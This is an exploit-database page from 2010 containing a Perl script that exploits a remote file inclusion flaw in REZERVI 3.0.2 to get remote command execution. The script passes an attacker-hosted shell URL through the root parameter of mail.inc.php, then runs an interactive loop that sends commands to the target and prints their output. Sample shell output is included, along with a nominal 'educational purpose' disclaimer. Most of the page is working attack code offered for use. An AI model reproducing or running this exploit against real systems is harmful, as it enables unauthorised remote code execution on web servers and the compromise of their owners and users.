Home / os / win7

REZERVI 3.0.2 (root) Remote Command Execution Exploit

Posted on 07 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>REZERVI 3.0.2 (root) Remote Command Execution Exploit </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>#!/usr/bin/perl
####################################################################
#	1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#	0     _                   __           __       __                     1
#	1   /'             __  /'__`        / \__  /'__`                   0
#	0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
#	1  /_/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__          0
#	0       / /    /   / \__/  \_  \_   /           1
#	1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
#	0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
#	1                   \____/ &gt;&gt; Exploit database separated by exploit   0
#	0                   /___/          type (local, remote, DoS, etc.)    1
#	1                                                                      1
#	0  [+] Site            : Inj3ct0r.com                                  0
#	1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
#	0                                                                      0
#	1                    ########################################          1
#	0                    I'm eidelweiss member from Inj3ct0r Team          1
#	1                    ########################################          0
#	0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#
# RFI Vulnerability! : [PATH/rezervi/include/mail.inc.php]
#
#		require_once($root.&quot;/include/phpmailer/phpmailer.inc.php&quot;);
#
# Because $root is not specific here , so we got RFI vulnerability and we can exploit with RCE
#
####################################################################
#
# REZERVI 3.0.2 Remote Command Execution Exploit
# download: http://www.rezervi.com/downloads/rezervi3_0_2.zip
#
# Author: Randy Arios a.k.a eidelweiss
# mail: eidelweiss[at]cyberservices[dot]com
# blog: http://eidelweiss-advisories.blogspot.com
# Greetz: Inj3ct0r Team - YOGYACARDERLINK - devilzc0de - JosS [hack0wn] - exploit-db team
#
# INDONESIAN HACKER still R0CK!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
# OUTPUT: (tested on localhost)
#
# [shell]:~$ id
#  uid=80(apache) gid=80(apache) groups=80(apache)
# [shell]:~$ uname -a
#  Linux localhost 2.6.29-grsec #2 SMP Fri Aug 14 21:37:03 PDT 2009 i686 GNU/Linux
# [shell]:~$ exit
# localhost:/home/eidelweiss/Desktop#


use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}

&amp;clear();

sub banner {
        &amp;clear();
	print &quot;[x] REZERVI 3.0.2 Remote Command Execution Exploit
&quot;;
	print &quot;[x] Written By eidelweiss
&quot;;
	print &quot;[x] eidelweiss[at]cyberservices[dot]com

&quot;;
	print &quot;[+] Usage:
&quot;;
	print &quot;[+]     $0 -vuln &quot;web+path&quot; -shell &quot;shell&quot;
&quot;;
	print &quot;[+] eX: $0 -vuln &quot;http://localhost/PATH/&quot; -shell &quot;http://yourweb/inj3ct0r/sh3ll.txt?&quot;

&quot;;
        exit();
}

my $options = GetOptions (
  'help!'            =&gt; $help, 
  'vuln=s'            =&gt; $vuln, 
  'shell=s'            =&gt; $shell
  );

&amp;banner unless ($vuln);
&amp;banner unless ($shell);

&amp;banner if $banner eq 1;

chomp($vuln);
chomp($shell);

while (){

	print &quot;[shell]:~$ &quot;;
	chomp($cmd=&lt;STDIN&gt;);

	if ($cmd eq &quot;exit&quot; || $cmd eq &quot;quit&quot;) {
		exit 0;
	}

	my $ua = LWP::UserAgent-&gt;new;
        $iny=&quot;?&amp;act=cmd&amp;cmd=&quot; . $cmd . &quot;&amp;d=/&amp;submit=1&amp;cmd_txt=1&quot;;
        chomp($iny);
        my $own = $vuln . &quot;/rezervi/include/mail.inc.php?root=&quot; . $shell . $iny;
        chomp($own);
	my $req = HTTP::Request-&gt;new(GET =&gt; $own);
	my $res = $ua-&gt;request($req);
	my $con = $res-&gt;content;
	if ($res-&gt;is_success){
		print $1,&quot;
&quot; if ( $con =~ m/readonly&gt; (.*?)&lt;/textarea&gt;/mosix);
	}
           else
             {
                print &quot;[p0c] Exploit failed
&quot;;
                exit(1);
             }
}

# __E0F__


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP